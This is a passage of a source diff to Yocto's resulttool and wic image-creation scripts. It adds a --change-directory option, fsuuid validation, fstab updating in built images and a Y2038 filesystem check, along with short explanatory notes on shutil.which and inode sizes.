+ classes.sort(key=lambda c: c in ("native", "nativesdk"))
+
extrafiles = extravalues.pop('extrafiles', {})
extra_pn = extravalues.pop('PN', None)
extra_pv = extravalues.pop('PV', None)
diff --git a/scripts/lib/resulttool/report.py b/scripts/lib/resulttool/report.py
index f0ca50ebe2..a349510ab8 100644
--- a/scripts/lib/resulttool/report.py
+++ b/scripts/lib/resulttool/report.py
@@ -176,7 +176,10 @@ class ResultsTextReport(object):
vals['sort'] = line['testseries'] + "_" + line['result_id']
vals['failed_testcases'] = line['failed_testcases']
for k in cols:
- vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
+ if total_tested:
+ vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
+ else:
+ vals[k] = "0 (0%)"
for k in maxlen:
if k in vals and len(vals[k]) > maxlen[k]:
maxlen[k] = len(vals[k])
diff --git a/scripts/lib/resulttool/resultutils.py b/scripts/lib/resulttool/resultutils.py
index 8917022d36..c5521d81bd 100644
--- a/scripts/lib/resulttool/resultutils.py
+++ b/scripts/lib/resulttool/resultutils.py
@@ -58,7 +58,11 @@ def append_resultsdata(results, f, configmap=store_map, configvars=extra_configv
testseries = posixpath.basename(posixpath.dirname(url.path))
else:
with open(f, "r") as filedata:
- data = json.load(filedata)
+ try:
+ data = json.load(filedata)
+ except json.decoder.JSONDecodeError:
+ print("Cannot decode {}. Possible corruption. Skipping.".format(f))
+ data = ""
testseries = os.path.basename(os.path.dirname(f))
else:
data = f
@@ -142,7 +146,7 @@ def generic_get_log(sectionname, results, section):
return decode_log(ptest['log'])
def ptestresult_get_log(results, section):
- return generic_get_log('ptestresuls.sections', results, section)
+ return generic_get_log('ptestresult.sections', results, section)
def generic_get_rawlogs(sectname, results):
if sectname not in results:
diff --git a/scripts/lib/scriptutils.py b/scripts/lib/scriptutils.py
index f92255d8dc..47a08194d0 100644
--- a/scripts/lib/scriptutils.py
+++ b/scripts/lib/scriptutils.py
@@ -18,7 +18,8 @@ import sys
import tempfile
import threading
import importlib
-from importlib import machinery
+import importlib.machinery
+import importlib.util
class KeepAliveStreamHandler(logging.StreamHandler):
def __init__(self, keepalive=True, **kwargs):
@@ -82,7 +83,9 @@ def load_plugins(logger, plugins, pluginpath):
logger.debug('Loading plugin %s' % name)
spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
if spec:
- return spec.loader.load_module()
+ mod = importlib.util.module_from_spec(spec)
+ spec.loader.exec_module(mod)
+ return mod
def plugin_name(filename):
return os.path.splitext(os.path.basename(filename))[0]
@@ -215,7 +218,8 @@ def fetch_url(tinfoil, srcuri, srcrev, destdir, logger, preserve_tmp=False, mirr
pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE']
for pathvar in pathvars:
path = rd.getVar(pathvar)
- shutil.rmtree(path)
+ if os.path.exists(path):
+ shutil.rmtree(path)
finally:
if fetchrecipe:
try:
diff --git a/scripts/lib/wic/engine.py b/scripts/lib/wic/engine.py
index 9ff4394757..7dbde85696 100644
--- a/scripts/lib/wic/engine.py
+++ b/scripts/lib/wic/engine.py
@@ -19,10 +19,10 @@ import os
import tempfile
import json
import subprocess
+import shutil
import re
from collections import namedtuple, OrderedDict
-from distutils.spawn import find_executable
from wic import WicError
from wic.filemap import sparse_copy
@@ -245,7 +245,7 @@ class Disk:
for path in pathlist.split(':'):
self.paths = "%s%s:%s" % (native_sysroot, path, self.paths)
- self.parted = find_executable("parted", self.paths)
+ self.parted = shutil.which("parted", path=self.paths)
if not self.parted:
raise WicError("Can't find executable parted")
@@ -283,7 +283,7 @@ class Disk:
"resize2fs", "mkswap", "mkdosfs", "debugfs"):
aname = "_%s" % name
if aname not in self.__dict__:
- setattr(self, aname, find_executable(name, self.paths))
+ setattr(self, aname, shutil.which(name, path=self.paths))
if aname not in self.__dict__ or self.__dict__[aname] is None:
raise WicError("Can't find executable '{}'".format(name))
return self.__dict__[aname]
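
For reference, shutil.which() accepts an explicit search path via its path argument,
which is what the lookups above rely on instead of distutils.spawn. A minimal sketch,
assuming a hypothetical colon-separated native-sysroot path:

    import shutil

    # Hypothetical search path built from a native sysroot
    paths = "/sysroot/sbin:/sysroot/usr/sbin:/sysroot/usr/bin:/sysroot/bin"

    parted = shutil.which("parted", path=paths)
    if not parted:
        raise RuntimeError("Can't find executable parted")
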
diff --git a/scripts/lib/wic/help.py b/scripts/lib/wic/help.py
index 1e3d06a87b..fcace95ff4 100644
--- a/scripts/lib/wic/help.py
+++ b/scripts/lib/wic/help.py
@@ -840,8 +840,8 @@ DESCRIPTION
meanings. The commands are based on the Fedora kickstart
documentation but with modifications to reflect wic capabilities.
- http://fedoraproject.org/wiki/Anaconda/Kickstart#part_or_partition
- http://fedoraproject.org/wiki/Anaconda/Kickstart#bootloader
+ https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#part-or-partition
+ https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#bootloader
Commands
@@ -980,6 +980,12 @@ DESCRIPTION
copies. This option only has an effect with the rootfs
source plugin.
+ --change-directory: This option is specific to wic. It changes to the
+ given directory before copying the files. This
+                      option is useful when we want to split a rootfs into
+                      multiple partitions while keeping the right
+                      permissions and usernames in all of them.
+
--extra-space: This option is specific to wic. It adds extra
space after the space filled by the content
of the partition. The final size can go
diff --git a/scripts/lib/wic/ksparser.py b/scripts/lib/wic/ksparser.py
index 76cc55b848..452a160232 100644
--- a/scripts/lib/wic/ksparser.py
+++ b/scripts/lib/wic/ksparser.py
@@ -152,6 +152,7 @@ class KickStart():
part.add_argument('--offset', type=sizetype("K", True))
part.add_argument('--exclude-path', nargs='+')
part.add_argument('--include-path', nargs='+')
+ part.add_argument('--change-directory')
part.add_argument("--extra-space", type=sizetype("M"))
part.add_argument('--fsoptions', dest='fsopts')
part.add_argument('--fstype', default='vfat',
@@ -228,6 +229,23 @@ class KickStart():
err = "%s:%d: SquashFS does not support LABEL" \
% (confpath, lineno)
raise KickStartError(err)
+ if parsed.fstype == 'msdos' or parsed.fstype == 'vfat':
+ if parsed.fsuuid:
+ if parsed.fsuuid.upper().startswith('0X'):
+ if len(parsed.fsuuid) > 10:
+ err = "%s:%d: fsuuid %s given in wks kickstart file " \
+ "exceeds the length limit for %s filesystem. " \
+                                  "It should be in the form of a 32 bit hexadecimal " \
+ "number (for example, 0xABCD1234)." \
+ % (confpath, lineno, parsed.fsuuid, parsed.fstype)
+ raise KickStartError(err)
+ elif len(parsed.fsuuid) > 8:
+ err = "%s:%d: fsuuid %s given in wks kickstart file " \
+ "exceeds the length limit for %s filesystem. " \
+                              "It should be in the form of a 32 bit hexadecimal " \
+ "number (for example, 0xABCD1234)." \
+ % (confpath, lineno, parsed.fsuuid, parsed.fstype)
+ raise KickStartError(err)
if parsed.use_label and not parsed.label:
err = "%s:%d: Must set the label with --label" \
% (confpath, lineno)
diff --git a/scripts/lib/wic/misc.py b/scripts/lib/wic/misc.py
index fe4abe8115..3e11822996 100644
--- a/scripts/lib/wic/misc.py
+++ b/scripts/lib/wic/misc.py
@@ -16,9 +16,9 @@ import logging
import os
import re
import subprocess
+import shutil
from collections import defaultdict
-from distutils import spawn
from wic import WicError
@@ -26,6 +26,7 @@ logger = logging.getLogger('wic')
# executable -> recipe pairs for exec_native_cmd
NATIVE_RECIPES = {"bmaptool": "bmap-tools",
+ "dumpe2fs": "e2fsprogs",
"grub-mkimage": "grub-efi",
"isohybrid": "syslinux",
"mcopy": "mtools",
@@ -45,7 +46,8 @@ NATIVE_RECIPES = {"bmaptool": "bmap-tools",
"parted": "parted",
"sfdisk": "util-linux",
"sgdisk": "gptfdisk",
- "syslinux": "syslinux"
+ "syslinux": "syslinux",
+ "tar": "tar"
}
def runtool(cmdln_or_args):
@@ -112,6 +114,15 @@ def exec_cmd(cmd_and_args, as_shell=False):
"""
return _exec_cmd(cmd_and_args, as_shell)[1]
+def find_executable(cmd, paths):
+ recipe = cmd
+ if recipe in NATIVE_RECIPES:
+ recipe = NATIVE_RECIPES[recipe]
+ provided = get_bitbake_var("ASSUME_PROVIDED")
+ if provided and "%s-native" % recipe in provided:
+ return True
+
+ return shutil.which(cmd, path=paths)
def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
"""
@@ -128,16 +139,19 @@ def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
if pseudo:
cmd_and_args = pseudo + cmd_and_args
- native_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin:%s/bin" % \
+ hosttools_dir = get_bitbake_var("HOSTTOOLS_DIR")
+
+ native_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin:%s/bin:%s" % \
(native_sysroot, native_sysroot,
- native_sysroot, native_sysroot)
+ native_sysroot, native_sysroot,
+ hosttools_dir)
native_cmd_and_args = "export PATH=%s:$PATH;%s" % \
(native_paths, cmd_and_args)
logger.debug("exec_native_cmd: %s", native_cmd_and_args)
# If the command isn't in the native sysroot say we failed.
- if spawn.find_executable(args[0], native_paths):
+ if find_executable(args[0], native_paths):
ret, out = _exec_cmd(native_cmd_and_args, True)
else:
ret = 127
diff --git a/scripts/lib/wic/partition.py b/scripts/lib/wic/partition.py
index 3490b4e75d..792bb3dcd3 100644
--- a/scripts/lib/wic/partition.py
+++ b/scripts/lib/wic/partition.py
@@ -31,6 +31,7 @@ class Partition():
self.extra_space = args.extra_space
self.exclude_path = args.exclude_path
self.include_path = args.include_path
+ self.change_directory = args.change_directory
self.fsopts = args.fsopts
self.fstype = args.fstype
self.label = args.label
@@ -53,6 +54,9 @@ class Partition():
self.uuid = args.uuid
self.fsuuid = args.fsuuid
self.type = args.type
+ self.updated_fstab_path = None
+ self.has_fstab = False
+ self.update_fstab_in_rootfs = False
self.lineno = lineno
self.source_file = ""
@@ -100,7 +104,7 @@ class Partition():
extra_blocks = self.extra_space
rootfs_size = actual_rootfs_size + extra_blocks
- rootfs_size *= self.overhead_factor
+ rootfs_size = int(rootfs_size * self.overhead_factor)
logger.debug("Added %d extra blocks to %s to get to %d total blocks",
extra_blocks, self.mountpoint, rootfs_size)
@@ -117,11 +121,15 @@ class Partition():
return self.fixed_size if self.fixed_size else self.size
def prepare(self, creator, cr_workdir, oe_builddir, rootfs_dir,
- bootimg_dir, kernel_dir, native_sysroot):
+ bootimg_dir, kernel_dir, native_sysroot, updated_fstab_path):
"""
Prepare content for individual partitions, depending on
partition command parameters.
"""
+ self.updated_fstab_path = updated_fstab_path
+ if self.updated_fstab_path and not (self.fstype.startswith("ext") or self.fstype == "msdos"):
+ self.update_fstab_in_rootfs = True
+
if not self.source:
if not self.size and not self.fixed_size:
raise WicError("The %s partition has a size of zero. Please "
@@ -191,29 +199,40 @@ class Partition():
(self.mountpoint, self.size, self.fixed_size))
def prepare_rootfs(self, cr_workdir, oe_builddir, rootfs_dir,
- native_sysroot, real_rootfs = True):
+ native_sysroot, real_rootfs = True, pseudo_dir = None):
"""
Prepare content for a rootfs partition i.e. create a partition
and fill it from a /rootfs dir.
Currently handles ext2/3/4, btrfs, vfat and squashfs.
"""
- p_prefix = os.environ.get("PSEUDO_PREFIX", "%s/usr" % native_sysroot)
- p_localstatedir = os.environ.get("PSEUDO_LOCALSTATEDIR",
- "%s/../pseudo" % rootfs_dir)
- p_passwd = os.environ.get("PSEUDO_PASSWD", rootfs_dir)
- p_nosymlinkexp = os.environ.get("PSEUDO_NOSYMLINKEXP", "1")
- pseudo = "export PSEUDO_PREFIX=%s;" % p_prefix
- pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % p_localstatedir
- pseudo += "export PSEUDO_PASSWD=%s;" % p_passwd
- pseudo += "export PSEUDO_NOSYMLINKEXP=%s;" % p_nosymlinkexp
- pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
rootfs = "%s/rootfs_%s.%s.%s" % (cr_workdir, self.label,
self.lineno, self.fstype)
if os.path.isfile(rootfs):
os.remove(rootfs)
+ p_prefix = os.environ.get("PSEUDO_PREFIX", "%s/usr" % native_sysroot)
+ if (pseudo_dir):
+ # Canonicalize the ignore paths. This corresponds to
+ # calling oe.path.canonicalize(), which is used in bitbake.conf.
+ ignore_paths = [rootfs] + (get_bitbake_var("PSEUDO_IGNORE_PATHS") or "").split(",")
+ canonical_paths = []
+ for path in ignore_paths:
+ if "$" not in path:
+ trailing_slash = path.endswith("/") and "/" or ""
+ canonical_paths.append(os.path.realpath(path) + trailing_slash)
+ ignore_paths = ",".join(canonical_paths)
+
+ pseudo = "export PSEUDO_PREFIX=%s;" % p_prefix
+ pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % pseudo_dir
+ pseudo += "export PSEUDO_PASSWD=%s;" % rootfs_dir
+ pseudo += "export PSEUDO_NOSYMLINKEXP=1;"
+ pseudo += "export PSEUDO_IGNORE_PATHS=%s;" % ignore_paths
+ pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
+ else:
+ pseudo = None
+
if not self.size and real_rootfs:
# The rootfs size is not set in .ks file so try to get it
# from bitbake variable
@@ -235,7 +254,7 @@ class Partition():
prefix = "ext" if self.fstype.startswith("ext") else self.fstype
method = getattr(self, "prepare_rootfs_" + prefix)
- method(rootfs, oe_builddir, rootfs_dir, native_sysroot, pseudo)
+ method(rootfs, cr_workdir, oe_builddir, rootfs_dir, native_sysroot, pseudo)
self.source_file = rootfs
# get the rootfs size in the right units for kickstart (kB)
@@ -243,7 +262,7 @@ class Partition():
out = exec_cmd(du_cmd)
self.size = int(out.split()[0])
- def prepare_rootfs_ext(self, rootfs, oe_builddir, rootfs_dir,
+ def prepare_rootfs_ext(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for an ext2/3/4 rootfs partition.
@@ -267,10 +286,21 @@ class Partition():
(self.fstype, extraopts, rootfs, label_str, self.fsuuid, rootfs_dir)
exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
+ if self.updated_fstab_path and self.has_fstab:
+ debugfs_script_path = os.path.join(cr_workdir, "debugfs_script")
+ with open(debugfs_script_path, "w") as f:
+ f.write("cd etc\n")
+ f.write("rm fstab\n")
+ f.write("write %s fstab\n" % (self.updated_fstab_path))
+ debugfs_cmd = "debugfs -w -f %s %s" % (debugfs_script_path, rootfs)
+ exec_native_cmd(debugfs_cmd, native_sysroot)
+
mkfs_cmd = "fsck.%s -pvfD %s" % (self.fstype, rootfs)
exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
- def prepare_rootfs_btrfs(self, rootfs, oe_builddir, rootfs_dir,
+ self.check_for_Y2038_problem(rootfs, native_sysroot)
+
+ def prepare_rootfs_btrfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for a btrfs rootfs partition.
@@ -293,7 +323,7 @@ class Partition():
self.mkfs_extraopts, self.fsuuid, rootfs)
exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
- def prepare_rootfs_msdos(self, rootfs, oe_builddir, rootfs_dir,
+ def prepare_rootfs_msdos(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for a msdos/vfat rootfs partition.
@@ -322,12 +352,16 @@ class Partition():
mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (rootfs, rootfs_dir)
exec_native_cmd(mcopy_cmd, native_sysroot)
+ if self.updated_fstab_path and self.has_fstab:
+ mcopy_cmd = "mcopy -i %s %s ::/etc/fstab" % (rootfs, self.updated_fstab_path)
+ exec_native_cmd(mcopy_cmd, native_sysroot)
+
chmod_cmd = "chmod 644 %s" % rootfs
exec_cmd(chmod_cmd)
prepare_rootfs_vfat = prepare_rootfs_msdos
- def prepare_rootfs_squashfs(self, rootfs, oe_builddir, rootfs_dir,
+ def prepare_rootfs_squashfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for a squashfs rootfs partition.
@@ -356,6 +390,8 @@ class Partition():
(self.fstype, extraopts, label_str, self.fsuuid, rootfs)
exec_native_cmd(mkfs_cmd, native_sysroot)
+ self.check_for_Y2038_problem(rootfs, native_sysroot)
+
def prepare_empty_partition_btrfs(self, rootfs, oe_builddir,
native_sysroot):
"""
@@ -417,3 +453,37 @@ class Partition():
mkswap_cmd = "mkswap %s -U %s %s" % (label_str, self.fsuuid, path)
exec_native_cmd(mkswap_cmd, native_sysroot)
+
+ def check_for_Y2038_problem(self, rootfs, native_sysroot):
+ """
+ Check if the filesystem is affected by the Y2038 problem
+ (Y2038 problem = 32 bit time_t overflow in January 2038)
+ """
+ def get_err_str(part):
+ err = "The {} filesystem {} has no Y2038 support."
+ if part.mountpoint:
+ args = [part.fstype, "mounted at %s" % part.mountpoint]
+ elif part.label:
+ args = [part.fstype, "labeled '%s'" % part.label]
+ elif part.part_name:
+ args = [part.fstype, "in partition '%s'" % part.part_name]
+ else:
+ args = [part.fstype, "in partition %s" % part.num]
+ return err.format(*args)
+
+ # ext2 and ext3 are always affected by the Y2038 problem
+ if self.fstype in ["ext2", "ext3"]:
+ logger.warn(get_err_str(self))
+ return
+
+ ret, out = exec_native_cmd("dumpe2fs %s" % rootfs, native_sysroot)
+
+        # whether ext4 is affected by the Y2038 problem depends on the inode size
+ for line in out.splitlines():
+ if line.startswith("Inode size:"):
+ size = int(line.split(":")[1].strip())
+ if size < 256:
+ logger.warn("%s Inodes (of size %d) are too small." %
+ (get_err_str(self), size))
+ break
+
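
For context, the check above treats ext4 inodes smaller than 256 bytes as lacking the
extended timestamp fields needed past January 2038, based on the "Inode size:" line that
dumpe2fs prints. A minimal standalone sketch of the same parsing, using subprocess
directly rather than exec_native_cmd (a simplification, not the wic code path):

    import subprocess

    def ext4_is_y2038_safe(device):
        # dumpe2fs prints filesystem metadata, including "Inode size:"
        out = subprocess.run(["dumpe2fs", device], capture_output=True,
                             text=True).stdout
        for line in out.splitlines():
            if line.startswith("Inode size:"):
                # 256-byte (or larger) inodes carry the extra timestamp bits
                return int(line.split(":")[1].strip()) >= 256
        return False
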
diff --git a/scripts/lib/wic/pluginbase.py b/scripts/lib/wic/pluginbase.py
index d9b4e57747..b64568339b 100644
--- a/scripts/lib/wic/pluginbase.py
+++ b/scripts/lib/wic/pluginbase.py
@@ -9,9 +9,11 @@ __all__ = ['ImagerPlugin', 'SourcePlugin']
import os
import logging
+import types
from collections import defaultdict
-from importlib.machinery import SourceFileLoader
+import importlib
+import importlib.util
from wic import WicError
from wic.misc import get_bitbake_var
@@ -54,7 +56,9 @@ class PluginMgr:
mname = fname[:-3]
mpath = os.path.join(ppath, fname)
logger.debug("loading plugin module %s", mpath)
- SourceFileLoader(mname, mpath).load_module()
+ spec = importlib.util.spec_from_file_location(mname, mpath)
+ module = importlib.util.module_from_spec(spec)
+ spec.loader.exec_module(module)
return PLUGINS.get(ptype)
diff --git a/scripts/lib/wic/plugins/imager/direct.py b/scripts/lib/wic/plugins/imager/direct.py
index 55db826e93..42704d1e10 100644
--- a/scripts/lib/wic/plugins/imager/direct.py
+++ b/scripts/lib/wic/plugins/imager/direct.py
@@ -58,11 +58,11 @@ class DirectPlugin(ImagerPlugin):
self.compressor = options.compressor
self.bmap = options.bmap
self.no_fstab_update = options.no_fstab_update
- self.original_fstab = None
+ self.updated_fstab_path = None
self.name = "%s-%s" % (os.path.splitext(os.path.basename(wks_file))[0],
strftime("%Y%m%d%H%M"))
- self.workdir = tempfile.mkdtemp(dir=self.outdir, prefix='tmp.wic.')
+ self.workdir = self.setup_workdir(options.workdir)
self._image = None
self.ptable_format = self.ks.bootloader.ptable
self.parts = self.ks.partitions
@@ -78,6 +78,16 @@ class DirectPlugin(ImagerPlugin):
self._image = PartitionedImage(image_path, self.ptable_format,
self.parts, self.native_sysroot)
+ def setup_workdir(self, workdir):
+ if workdir:
+ if os.path.exists(workdir):
+ raise WicError("Internal workdir '%s' specified in wic arguments already exists!" % (workdir))
+
+ os.makedirs(workdir)
+ return workdir
+ else:
+ return tempfile.mkdtemp(dir=self.outdir, prefix='tmp.wic.')
+
def do_create(self):
"""
Plugin entry point.
@@ -90,11 +100,8 @@ class DirectPlugin(ImagerPlugin):
finally:
self.cleanup()
- def _write_fstab(self, image_rootfs):
- """overriden to generate fstab (temporarily) in rootfs. This is called
- from _create, make sure it doesn't get called from
- BaseImage.create()
- """
+ def update_fstab(self, image_rootfs):
+ """Assume partition order same as in wks"""
if not image_rootfs:
return
@@ -104,20 +111,11 @@ class DirectPlugin(ImagerPlugin):
with open(fstab_path) as fstab:
fstab_lines = fstab.readlines()
- self.original_fstab = fstab_lines.copy()
-
- if self._update_fstab(fstab_lines, self.parts):
- with open(fstab_path, "w") as fstab:
- fstab.writelines(fstab_lines)
- else:
- self.original_fstab = None
- def _update_fstab(self, fstab_lines, parts):
- """Assume partition order same as in wks"""
updated = False
- for part in parts:
+ for part in self.parts:
if not part.realnum or not part.mountpoint \
- or part.mountpoint == "/":
+ or part.mountpoint == "/" or not (part.mountpoint.startswith('/') or part.mountpoint == "swap"):
continue
if part.use_uuid:
@@ -144,7 +142,10 @@ class DirectPlugin(ImagerPlugin):
fstab_lines.append(line)
updated = True
- return updated
+ if updated:
+ self.updated_fstab_path = os.path.join(self.workdir, "fstab")
+ with open(self.updated_fstab_path, "w") as f:
+ f.writelines(fstab_lines)
def _full_path(self, path, name, extention):
""" Construct full file path to a file we generate. """
@@ -160,7 +161,7 @@ class DirectPlugin(ImagerPlugin):
a partitioned image.
"""
if not self.no_fstab_update:
- self._write_fstab(self.rootfs_dir.get("ROOTFS_DIR"))
+ self.update_fstab(self.rootfs_dir.get("ROOTFS_DIR"))
for part in self.parts:
# get rootfs size from bitbake variable if it's not set in .ks file
@@ -273,12 +274,6 @@ class DirectPlugin(ImagerPlugin):
if os.path.isfile(path):
shutil.move(path, os.path.join(self.outdir, fname))
- #Restore original fstab
- if self.original_fstab:
- fstab_path = self.rootfs_dir.get("ROOTFS_DIR") + "/etc/fstab"
- with open(fstab_path, "w") as fstab:
- fstab.writelines(self.original_fstab)
-
# remove work directory
shutil.rmtree(self.workdir, ignore_errors=True)
@@ -343,6 +338,13 @@ class PartitionedImage():
part.fsuuid = '0x' + str(uuid.uuid4())[:8].upper()
else:
part.fsuuid = str(uuid.uuid4())
+ else:
+                # make sure the fsuuid for vfat/msdos aligns with the 0xYYYYYYYY format
+ if part.fstype == 'vfat' or part.fstype == 'msdos':
+ if part.fsuuid.upper().startswith("0X"):
+ part.fsuuid = '0x' + part.fsuuid.upper()[2:].rjust(8,"0")
+ else:
+ part.fsuuid = '0x' + part.fsuuid.upper().rjust(8,"0")
def prepare(self, imager):
"""Prepare an image. Call prepare method of all image partitions."""
@@ -351,7 +353,8 @@ class PartitionedImage():
# sizes before we can add them and do the layout.
part.prepare(imager, imager.workdir, imager.oe_builddir,
imager.rootfs_dir, imager.bootimg_dir,
- imager.kernel_dir, imager.native_sysroot)
+ imager.kernel_dir, imager.native_sysroot,
+ imager.updated_fstab_path)
# Converting kB to sectors for parted
part.size_sec = part.disk_size * 1024 // self.sector_size
diff --git a/scripts/lib/wic/plugins/source/bootimg-efi.py b/scripts/lib/wic/plugins/source/bootimg-efi.py
index 2cfdc10ecd..05e8471116 100644
--- a/scripts/lib/wic/plugins/source/bootimg-efi.py
+++ b/scripts/lib/wic/plugins/source/bootimg-efi.py
@@ -277,6 +277,13 @@ class BootimgEFIPlugin(SourcePlugin):
logger.debug("Added %d extra blocks to %s to get to %d total blocks",
extra_blocks, part.mountpoint, blocks)
+ # required for compatibility with certain devices expecting file system
+ # block count to be equal to partition block count
+ if blocks < part.fixed_size:
+ blocks = part.fixed_size
+ logger.debug("Overriding %s to %d total blocks for compatibility",
+ part.mountpoint, blocks)
+
# dosfs image, created by mkdosfs
bootimg = "%s/boot.img" % cr_workdir
diff --git a/scripts/lib/wic/plugins/source/bootimg-partition.py b/scripts/lib/wic/plugins/source/bootimg-partition.py
index 138986a71e..5dbe2558d2 100644
--- a/scripts/lib/wic/plugins/source/bootimg-partition.py
+++ b/scripts/lib/wic/plugins/source/bootimg-partition.py
@@ -141,7 +141,7 @@ class BootimgPartitionPlugin(SourcePlugin):
break
if not kernel_name:
- raise WicError('No kernel file founded')
+ raise WicError('No kernel file found')
# Compose the extlinux.conf
extlinux_conf = "default Yocto\n"
diff --git a/scripts/lib/wic/plugins/source/bootimg-pcbios.py b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
index f2639e7004..32e47f1831 100644
--- a/scripts/lib/wic/plugins/source/bootimg-pcbios.py
+++ b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
@@ -186,8 +186,10 @@ class BootimgPcbiosPlugin(SourcePlugin):
# dosfs image, created by mkdosfs
bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno)
- dosfs_cmd = "mkdosfs -n boot -i %s -S 512 -C %s %d" % \
- (part.fsuuid, bootimg, blocks)
+ label = part.label if part.label else "boot"
+
+ dosfs_cmd = "mkdosfs -n %s -i %s -S 512 -C %s %d" % \
+ (label, part.fsuuid, bootimg, blocks)
exec_native_cmd(dosfs_cmd, native_sysroot)
mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir)
diff --git a/scripts/lib/wic/plugins/source/rootfs.py b/scripts/lib/wic/plugins/source/rootfs.py
index 705aeb5563..c8c1c0f58f 100644
--- a/scripts/lib/wic/plugins/source/rootfs.py
+++ b/scripts/lib/wic/plugins/source/rootfs.py
@@ -20,7 +20,7 @@ from oe.path import copyhardlinktree
from wic import WicError
from wic.pluginbase import SourcePlugin
-from wic.misc import get_bitbake_var
+from wic.misc import get_bitbake_var, exec_native_cmd
logger = logging.getLogger('wic')
@@ -44,6 +44,15 @@ class RootfsPlugin(SourcePlugin):
return os.path.realpath(image_rootfs_dir)
+ @staticmethod
+ def __get_pseudo(native_sysroot, rootfs, pseudo_dir):
+ pseudo = "export PSEUDO_PREFIX=%s/usr;" % native_sysroot
+ pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % pseudo_dir
+ pseudo += "export PSEUDO_PASSWD=%s;" % rootfs
+ pseudo += "export PSEUDO_NOSYMLINKEXP=1;"
+ pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
+ return pseudo
+
@classmethod
def do_prepare_partition(cls, part, source_params, cr, cr_workdir,
oe_builddir, bootimg_dir, kernel_dir,
@@ -68,18 +77,55 @@ class RootfsPlugin(SourcePlugin):
"it is not a valid path, exiting" % part.rootfs_dir)
part.rootfs_dir = cls.__get_rootfs_dir(rootfs_dir)
+ part.has_fstab = os.path.exists(os.path.join(part.rootfs_dir, "etc/fstab"))
+ pseudo_dir = os.path.join(part.rootfs_dir, "../pseudo")
+ if not os.path.lexists(pseudo_dir):
+ logger.warn("%s folder does not exist. "
+ "Usernames and permissions will be invalid " % pseudo_dir)
+ pseudo_dir = None
new_rootfs = None
+ new_pseudo = None
# Handle excluded paths.
- if part.exclude_path or part.include_path:
- # We need a new rootfs directory we can delete files from. Copy to
- # workdir.
+ if part.exclude_path or part.include_path or part.change_directory or part.update_fstab_in_rootfs:
+ # We need a new rootfs directory we can safely modify without
+ # interfering with other tasks. Copy to workdir.
new_rootfs = os.path.realpath(os.path.join(cr_workdir, "rootfs%d" % part.lineno))
if os.path.lexists(new_rootfs):
shutil.rmtree(os.path.join(new_rootfs))
- copyhardlinktree(part.rootfs_dir, new_rootfs)
+ if part.change_directory:
+ cd = part.change_directory
+ if cd[-1] == '/':
+ cd = cd[:-1]
+ if os.path.isabs(cd):
+ logger.error("Must be relative: --change-directory=%s" % cd)
+ sys.exit(1)
+ orig_dir = os.path.realpath(os.path.join(part.rootfs_dir, cd))
+ if not orig_dir.startswith(part.rootfs_dir):
+ logger.error("'%s' points to a path outside the rootfs" % orig_dir)
+ sys.exit(1)
+
+ else:
+ orig_dir = part.rootfs_dir
+ copyhardlinktree(orig_dir, new_rootfs)
+
+ # Convert the pseudo directory to its new location
+ if (pseudo_dir):
+ new_pseudo = os.path.realpath(
+ os.path.join(cr_workdir, "pseudo%d" % part.lineno))
+ if os.path.lexists(new_pseudo):
+ shutil.rmtree(new_pseudo)
+ os.mkdir(new_pseudo)
+ shutil.copy(os.path.join(pseudo_dir, "files.db"),
+ os.path.join(new_pseudo, "files.db"))
+
+ pseudo_cmd = "%s -B -m %s -M %s" % (cls.__get_pseudo(native_sysroot,
+ new_rootfs,
+ new_pseudo),
+ orig_dir, new_rootfs)
+ exec_native_cmd(pseudo_cmd, native_sysroot)
for path in part.include_path or []:
copyhardlinktree(path, new_rootfs)
@@ -99,17 +145,34 @@ class RootfsPlugin(SourcePlugin):
logger.error("'%s' points to a path outside the rootfs" % orig_path)
sys.exit(1)
+ if new_pseudo:
+ pseudo = cls.__get_pseudo(native_sysroot, new_rootfs, new_pseudo)
+ else:
+ pseudo = None
if path.endswith(os.sep):
# Delete content only.
for entry in os.listdir(full_path):
full_entry = os.path.join(full_path, entry)
- if os.path.isdir(full_entry) and not os.path.islink(full_entry):
- shutil.rmtree(full_entry)
- else:
- os.remove(full_entry)
+ rm_cmd = "rm -rf %s" % (full_entry)
+ exec_native_cmd(rm_cmd, native_sysroot, pseudo)
else:
# Delete whole directory.
- shutil.rmtree(full_path)
+ rm_cmd = "rm -rf %s" % (full_path)
+ exec_native_cmd(rm_cmd, native_sysroot, pseudo)
+
+ # Update part.has_fstab here as fstab may have been added or
+ # removed by the above modifications.
+ part.has_fstab = os.path.exists(os.path.join(new_rootfs, "etc/fstab"))
+ if part.update_fstab_in_rootfs and part.has_fstab:
+ fstab_path = os.path.join(new_rootfs, "etc/fstab")
+ # Assume that fstab should always be owned by root with fixed permissions
